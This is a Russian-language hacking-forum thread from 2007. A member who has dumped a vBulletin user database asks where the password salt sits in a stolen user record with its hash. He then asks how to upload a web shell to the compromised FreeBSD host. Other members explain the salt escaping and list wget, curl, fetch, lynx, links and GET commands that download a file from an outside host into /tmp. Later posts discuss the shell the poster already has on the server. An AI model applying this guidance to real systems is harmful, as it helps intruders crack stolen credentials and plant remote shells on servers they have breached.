Форумы vBulletin [db] Где соль?

Discussion in 'Уязвимости CMS/форумов' started by Krasti, 14 Jan 2007.

  1. Krasti

    Krasti New Member

    Joined:
    28 Dec 2006
    Messages:
    8
    Likes Received:
    3
    Reputations:
    0
    Может глупый вопрос, но что-то понять не могу. Вот сдамбил базу юзеров, получил примерно вот такую тему:
    PHP:
    INSERT INTO vb_user VALUES('1','6','','0','Rich','6c507b8dd286d058e69a37436a751bde','2006-11-20','***@gmail.com','0','','','','','','2','Администратор','0','1127663100','0','1159464415','1163971905','1152297660','33','10','5','3','0','0','0','0','2135','','0000-00-00','-1','1','','0','0','','0','0','-1','0','0','p\\u','2','','2','1','1');
    А соль здесь получается "p\\u", или что?

    Добавил: И что бы новую тему не создавать, помгите пожалуйста.
    А какой камандой после этого можно будет залить шелл на хост (FreeBSD)?
     
    #1 Krasti, 14 Jan 2007
    Last edited: 14 Jan 2007
    1 person likes this.
  2. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    соль в булке состоит из 3 знаков, может в другой таблице
     
  3. Krasti

    Krasti New Member

    Joined:
    28 Dec 2006
    Messages:
    8
    Likes Received:
    3
    Reputations:
    0
    Лучше от этого мне не стало. :) Кстати во второй базе такая же тема, может что не так делаю? Да по другому вроде никак.

    А может вообще в булке быть пароль без соли?
     
  4. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    да вот она "p\u"..просто первый символ "\" добавляется для экранирования некоторых символов (в данном случае "\"), который могут нарушить работу скрипта.
     
    #4 злюка, 14 Jan 2007
    Last edited: 15 Jan 2007
    2 people like this.
  5. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    вбиваешь
    which wget fetch curl links lynx
    и смотришь какие качалки есть. в зависимости от этого вбиваешь нужное
    Code:
    - wget -o /tmp/file.c http://site.ru/file.c
    - curl -o /tmp/file.c http://site.ru/file.c
    - fetch -o /tmp/file.c http://site.ru/file.c
    - lynx -source "http://site.ru/file.c" > /tmp/file.c
    - links  -source "http://site.ru/file.c" > /tmp/file.c
    - GET http://site.ru/file.c > /tmp/file.c
    на примере ты скачиваешь с сайта site.ru файл file.с и сохраняешь его в папке /tmp
     
    _________________________
    1 person likes this.
  6. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    собственно шелл ты мы уже получили, зачем еще один :confused:
     
  7. Krasti

    Krasti New Member

    Joined:
    28 Dec 2006
    Messages:
    8
    Likes Received:
    3
    Reputations:
    0
    Большое спасибо!
     
  8. Krasti

    Krasti New Member

    Joined:
    28 Dec 2006
    Messages:
    8
    Likes Received:
    3
    Reputations:
    0
    Я понимаю, что шелл есть, просто юзать такой шелл для меня труднова-то. Вот я и хочу залить шелл, который мне нравится. :) Кстати, спасибо за помощь.
     
  9. ReanimatoR

    ReanimatoR Elder - Старейшина

    Joined:
    27 Aug 2006
    Messages:
    120
    Likes Received:
    118
    Reputations:
    34
    вместо этого смд можешь спокойно заливать свой нормальный шелл!
     
  10. Krasti

    Krasti New Member

    Joined:
    28 Dec 2006
    Messages:
    8
    Likes Received:
    3
    Reputations:
    0
    Да я знаю, но работать он что-то отказывался. А смд пашет нормально. :)